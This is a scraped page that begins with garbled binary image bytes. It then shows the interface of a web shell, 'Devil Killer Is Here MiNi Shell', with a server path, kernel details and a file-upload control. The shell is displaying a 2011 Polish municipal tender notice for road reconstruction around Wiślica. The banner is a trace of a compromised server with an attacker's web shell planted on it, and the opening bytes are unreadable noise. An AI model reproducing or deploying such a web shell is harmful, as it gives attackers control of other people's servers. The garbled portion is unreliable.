JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110317/47834-N-2011.html

<p class="kh_header"><b>Wiślica: Przebudowa dróg gminnych: w miejscowości Wiślica ul. Złota dz. Nr 319/3, w miejscowości Gorysławice dz. Nr 448/4,  Nr 004388T Chotel Czerwony - Zawierzbie, Nr 004384T Skotniki Górne przez wieś, Nr 004378T Bilczów - Poddębie oraz odbudowa drogi gminnej w miejscowości Ostrów Nr Ewid.dz.134.</b><br>
<b>Numer ogłoszenia: 47834 - 2011; data zamieszczenia: 17.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiślica , ul. Okopowa 8, 28-160 Wiślica, woj. świętokrzyskie, tel. 041 3792106, faks 041 3722128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.wislica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych: w miejscowości Wiślica ul. Złota dz. Nr 319/3, w miejscowości Gorysławice dz. Nr 448/4,  Nr 004388T Chotel Czerwony - Zawierzbie, Nr 004384T Skotniki Górne przez wieś, Nr 004378T Bilczów - Poddębie oraz odbudowa drogi gminnej w miejscowości Ostrów Nr Ewid.dz.134..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Zadanie Nr 1:
1. Przebudowa drogi gminnej Nr 004388T Chotel Czerwony - Zawierzbie na długości 950 mb
1.1 Roboty pomiarowe przy liniowych robotach ziemnych- trasa dróg w terenie równinnym - 0,95 km
1.2 Koryta gł. 20 cm wykonywane w gruntach kat. II-IV równiarką - 3 325,00 m2
1.3 Dolna warstwa podbudowy z kruszywa kamiennego 31,5-63, grubość warstwy po uwałowaniu 20 cm. szer.3,5 m - 3325,00 m2
1.4 Górna warstwa podbudowy z kruszywa kamiennego, grubość warstwy po uwałowaniu 10 cm. szer.3,5 m - 3325,00 m2
1.5 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład. - 2850,00 m2
1.6 Wykonanie przepustów pod koroną drogi z rur o średnicy 50 cm na ławie z kruszywa naturalnego, wykonanie naziomu i ścianek prostych prefabrykowanych w km 0+010 i km0+700 (szt2) -  14 mb 
1.7 Utwardzenie poboczy kruszywem kamiennym 0-31,5 obustronnie gr. 4 cm - 475 m2 
1.8  Pionowe znaki drogowe - ostrzegawcze i informacyjne A-7 szt.3, A- 6b - 1 szt, A- 6c - 1 szt, A-3 - szt.2 - razem 7 szt.
1.9 Słupki do znaków drogowych z rur stalowych o śr 70 mm - 7szt.

Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 9 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 19 do SIWZ
- Książka przedmiarów - Załącznik nr 14 do SIWZ

2. Przebudowa drogi gminnej Nr 004378T Bilczów - Poddębie na długości 940 mb
2.1 Tyczenie trasy w terenie równinnym - 0,94 km
2.2 Mechaniczne ścinanie drzew z karczowaniem pni - 30 szt
2.3 Karczowanie krzaków i podszyć - 0,3 ha
2.4 Profilowanie i zagęszczanie podłoża wykonane mechanicznia w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni - 3760,00 m2 
2.5 Górna warstwa podbudowy z kruszywa kamiennego, grubość warstwy po uwałowaniu 15 cm. szer.4 m 3760,00 m2
2.6 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład. szer.3,5m  - 3290,00 m2
2.7 Wykonanie przepustu pod koroną drogi i na zjeździe na drogę dojazdową z rur o średnicy 60 cm na ławie z kruszywa naturalnego z wykonaniem naziomu i ściankami prostymi prefabrykowanymi (szt.2) - 16 mb
2.8 Rozebranie przepustów rurowych o śr, 40 cm - 150 mb
2.9 Przepusty rurowe pod zjazdami (30 szt) - rury żelbetowe o średnicy 50 cm - 150 mb
2.10 Ścianki czołowe prefabrykowane dla przepustów o śr.50 cm - 60 szt
2.11 Przepusty rurowe pod zjazdami (25 szt) - rury żelbetowe o średnicy 40 cm - 125 mb
2.12 Ścianki czołowe prefabrykowane dla przepustów o śr.40 cm - 50 szt
2.13 Górna warstwa z kruszywa łamanego na zjazdach, grubość warstwy po zagęszczeniu 15 cm - 550 m2
2.14 Podczyszczenie istniejącego rowu z uzupełnieniem poboczy ,wykonywane koparkami podsiębiernymi o poj. łyżki 0.4 m3 w gr. kat. III, nadmiar ziemi z odwozem na odl. do 1 km sam. samowyład.- 1960,00 mb
2.15 Utwardzenie poboczy tłuczniem kamiennym gr.4 cm szer. 2*0,25m - 470,00 m2
2.16 Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow.  ponad 0.3 m2 - szt.2
2.17 Montaż opraw oświetleniowych OUSC-125 na istniejącej linii elektrycznej - 6 szt.

Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 10 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 19 do SIWZ
- Książka przedmiarów - Załącznik Nr 15 do SIWZ


3. Przebudowa drogi gminnej Nr 004384T Skotniki Górne przez wieś na długości 1320 mb
3.1 Mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową w ilości 75kg/ m2,, standard II, transport mieszanki samochód samowyład. o ładowności 10-15 ton - 396 t
3.2 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład. szer.4,0 m  - 5280,00 m2
Zatoki autobusowe
3.3 Koryta gł. 40 cm wykonywane w gruntach kat. II-IV wykonywane koparkami o poj. łyżki 0.25m3 z transportem urobku na odległość 1km - m3 -62,4  m3
3.4 Warstwy odsączające wykonywane ręcznie, zagęszczane przy użyciu walca wibracyjnego, gr. warstwy 10 cm- 156 m2
3.5 Dolna warstwa podbudowy z kruszywa kamiennego 31,5-63, grubość warstwy po uwałowaniu 20 cm - 156 m2
3.6 Górna warstwa podbudowy z kruszywa kamiennego, grubość warstwy po uwałowaniu 10 cm - 156 m2
3.7 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład. - 156 m2
3.8 Pionowe znaki drogowe - ostrzegawcze i informacyjne A-7 szt.3,  D-6 - 2 szt, D-42 - 1 szt, D-15 - 2 szt - razem 8 szt.
3.9 Pionowe znaki drogowe miejscowości - E 17a (Skotniki Górne) - szt.1
3.10 Pionowe znaki drogowe - tablice prowadzące dwustronne - U-3e - szt. 10
3.11 Słupki do znaków drogowych z rur stalowych o śr 70 mm - szt - 23
3.12 Oznakowanie poziome jezdni farbą chlorokauczkową odblaskową, przejścia dla pieszych - P-10 - 8 m2
3.13 Utwardzenie poboczy kruszywem kamiennym 0-31,5 obustronnie gr. 10 cm - 1320 m2 
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 11 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 19 do SIWZ
- Książka przedmiarów - Załącznik Nr 16 do SIWZ
4. Przebudowa drogi gminnej ul. Złota w Wiślicy dz. Nr 319/3 na długości 220 mb
Roboty przygotowawcze
4.1 Zebranie ziemi na skarpach z ich profilowaniem z odwozem do 1km - 120 m3
Chodnik
4.2 Rozebranie krawężnika wraz z podbudową - 120 mb
4.3 Wbudowanie krawężnika wibroprasowanego o wym. 15/30 x100cm wraz z wykonaniem ławy betonowej z oporem z betonu B-15-200 mb
4.4 Wbudowanie obrzeża wibroprasowanego o wymiarach 6x20cm na podsypce cementowo-piaskowej.-  100 mb
4.5 Warstwa odsączająca wykonana z piasku zagęszczona mechanicznie o grubości 10cm - 87 m2
4.6 Chodnik z kostki brukowej betonowej szarej gr.6 cm układanej na podsypce z kruszywa łamanego o frakcji 4-6mm o grubości 5cm po zagęszczeniu. Spoiny wypełnione piaskiem  - 87 m2
Zjazdy
4.7 Koryto na zjazdach o głębokości 25cm wykonane mechanicznie w gruntach II-IV kategorii wg zestawienia - 38 m2
4.8 Wykonanie warstwy odsączającej - zagęszczenie mechaniczne, grubość warstwy 10cm po zagęszczeniu wg zestawienia - 38 m2
4.9 Dolna warstwa podbudowy z kruszywa łamanego 31,5- 63mm, grubość warstwy po zagęszczeniu 20 cm Transport samochodami o ładowności 10-15ton - 38 m2
4.10 Wykonanie nawierzchni z kostki brukowej szarej o grubości 8 cm, układanej na podsypce z kruszywa kamiennego 4-6mm, grubość 5cm po zagęszczeniu - 38 m2
Przepusty
4.11 Wykonanie przepustu pod koroną drogi z rur o średnicy 60 cm na ławie z kruszywa naturalnego wykonanie naziomu i ścianek prostych prefabrykowanych - 7 mb
Podbudowa
4.12 Podbudowa z kruszywa łamanego 0-31,5 mm, grubość warstwy po zagęszczeniu 15cm Transport samochodami o ładowności 10-15ton - 502 m2
4.13 Mechaniczne wyrównywanie istniejącej podbudowy mieszanką mineralno-asfaltową w ilości 75 kg/m2 standard II, transport mieszanki samochod. samowyład.o ładowności 10-15 ton - 37,65 ton
Nawierzchnia 
4.14 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki  samochodami samowyład. - 502 m2
Pobocza
4.15 Utwardzenie poboczy kruszywem kamiennym 0-31,5 obustronnie gr.10 cm w km 0+100 do km 0+220- 120 m2
Oznakowanie pionowe
4.16 Pionowe znaki drogowe - ostrzegawcze i informacyjne A-7 - 2 szt;
4.17 Słupki do znaków drogowych z rur stalowych o średnicy 70mm  - 2 szt.
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 12 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr19 do SIWZ
- Książka przedmiarów - Załącznik Nr 17 do SIWZ

5. Przebudowa drogi gminnej w miejscowości Gorysławice dz. Nr 448/4 na długości 215
Chodnik
5.1 Rozebranie krawężnika wraz z podbudową - 195 mb
5.2 Rozebranie chodników z płyt betonowych o wymiarach 50 x 50 x 7cm oraz kostki brukowej - 292 m2
5.3 Wbudowanie krawężnika wibroprasowanego o wymiarach 15/30 x 100cm wraz z wykonaniem ławy betonowej z oporem z betonu B-15 - 380 mb
5.4 Wbudowanie obrzeża wibroprasowanego o wymiarach 6x20cm na podsypce cementowo-piaskowej - 380 mb
5.5 Warstwa odsączająca wykonana z piasku zagęszczona mechanicznie o grubości 10cm - 453 m2
5.6 Chodnik z kostki brukowej betonowej szarej gr.6 cm układanej na podsypce z kruszywa łamanego o frakcji 4-6mm o grubości 5cm po zagęszczeniu. Spoiny wypełnione piaskiem  - 453 m2
Zjazdy
5.7 Koryto na zjazdach o głębokości 25cm wykonane mechanicznie w gruntach II-IV kategorii wg zestawienia - 117 m2
5.8 Wykonanie warstwy odsączającej - zagęszczenie mechaniczne, grubość warstwy 10cm po zagęszczeniu wg zestawienia - 117m2
5.9 Dolna warstwa podbudowy z kruszywa łamanego 31,5- 63mm, grubość warstwy po zagęszczeniu 20 cm Transport samochodami o ładowności 10-15ton - 117 m2
5.10 Wykonanie nawierzchni z kostki brukowej szarej o grubości 8 cm, układanej na podsypce z kruszywa kamiennego 4-6mm, grubość 5cm po zagęszczeniu - 117 m2
5.11 Wykonanie koryta odpływowego z rusztem stalowym - 12 mb
5.12 Wykonanie ścieków korytkowych pod chodnikiem - 6 mb
Nawierzchnia 
5.13 Mechaniczne wyrównywanie istniejącej podbudowy mieszanką mineralno-asfaltową w ilości 50 kg/m2 standard II, transport mieszanki samochod. samowyład.o ładowności 10-15 ton - 75,5 ton
5.14 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki  samochodami  samowyład. - 1560 m2
Oznakowanie pionowe
5.15 Pionowe znaki drogowe - ostrzegawcze i informacyjne A-7 - 2 szt; D-6 - 2 szt; - 4 szt.
5.16 Słupki do znaków drogowych z rur stalowych o średnicy 70 mm - 4 szt.
5.17 Oznakowanie poziome jezdni farbą chlorokauczukową odblaskową, przejścia dla pieszych P-10 - 14 m2   
 Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 13 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 19 do SIWZ
- Książka przedmiarów - Załącznik Nr 18 do SIWZ

II. Zadanie Nr 2 
1. Odbudowa drogi gminnej w miejscowości Ostrów Nr Ewid.dz.134 na długości 95 mb
1.1 Roboty pomiarowe przy liniowych robotach ziemnych-trasa dróg w terenie równinny - 95mb.
1.2 mechaniczne zagęszczanie i profilowanie podłoża - 332,5 m2
1.3 wyrównanie istniejącej warstwy podbudowy z kruszywa kamiennego 0-31,5mm-63mm grubość warstwy po uwałowaniu 10 cm. szer.3,5 m - 332,5 m2
1.4 wykonanie górnej warstwy podbudowy z kruszywa kamiennego 0-31,5 mm grubość warstwy po uwałowaniu 10 cm. szer.3,5 m - 332,5 m2
1.5 wykonanie warstwy ścieralnej z masy mineralno-bitumicznej asfaltowej grubość warstwy ścieralnej po zagęszczeniu 4 cm szer. 3,00 m - 285 m2.
1.6 Utwardzenie poboczy tłuczniem kamiennym gr.4 cm szer. 2*0,25m - 47,5 m2
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 20 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 19 do SIWZ
- Książka przedmiarów - Załącznik Nr 21 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe określone w przedmiocie zamówienia, zgodne z przedmiotem zamówienia podstawowego, na zasadach określonych w art. 67 ust.1. pkt. 6) ustawy- Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 30 000,00 zł, słownie: trzydzieści tysięcy zł.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) pieniądzu, przelewem na rachunek bankowy: 
Urząd Gminy w Wiślicy
Bank Spółdzielczy w Busku-Zdroju o/Wiślica
nr rachunku: 48848000042002006002840001 dla wadium z adnotacją wadium - Przebudowa dróg gminnych: w miejscowości Wiślica, Gorysławice, Chotel Czerwony - Zawierzbie, Skotniki Górne, Bilczów - Poddębie, Ostrów
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
U W A G A!!! 
W przypadku:
- Wniesienia wadium w pieniądzu przelewem na rachunek bankowy do oferty należy dołączyć kserokopię potwierdzoną za zgodność z oryginałem lub oryginał dokumentu wadialnego - przelewu, 
- Wniesienia wadium w pozostałych formach innych niż pieniężna należy dołączyć do oferty dokument w oryginale.
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. - oświadczenie Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy wykonali w okresie ostatnich pięciu lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Zamawiający uzna za spełnienie przez Wykonawcę powyższego warunku jeżeli wykaże, że wykonał co najmniej: Robotę/roboty polegającą na wykonaniu drogi/dróg o nawierzchni asfaltowej o łącznej długości nie mniejszej niż 3000 mb.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie przez Wykonawcę powyższego warunku jeżeli Wykonawca wykaże, że: dysponuje lub będzie dysponował narzędziami w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.
Zamawiający żąda aby Wykonawca wykazał że dysponuje lub będzie dysponował: 
- Rozściełaczem  mas bitumicznych co najmniej - szt 1,
- Walcem drogowy co najmniej - szt 2,
- Koparką co najmniej - szt 2,
- Samochodem samowyładowczy co najmniej - szt 2,
- Piłą do cięcia asfaltu co najmniej - szt 1. 
- równiarka co najmniej - szt 1.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. - oświadczenie Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. - oświadczenie Nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

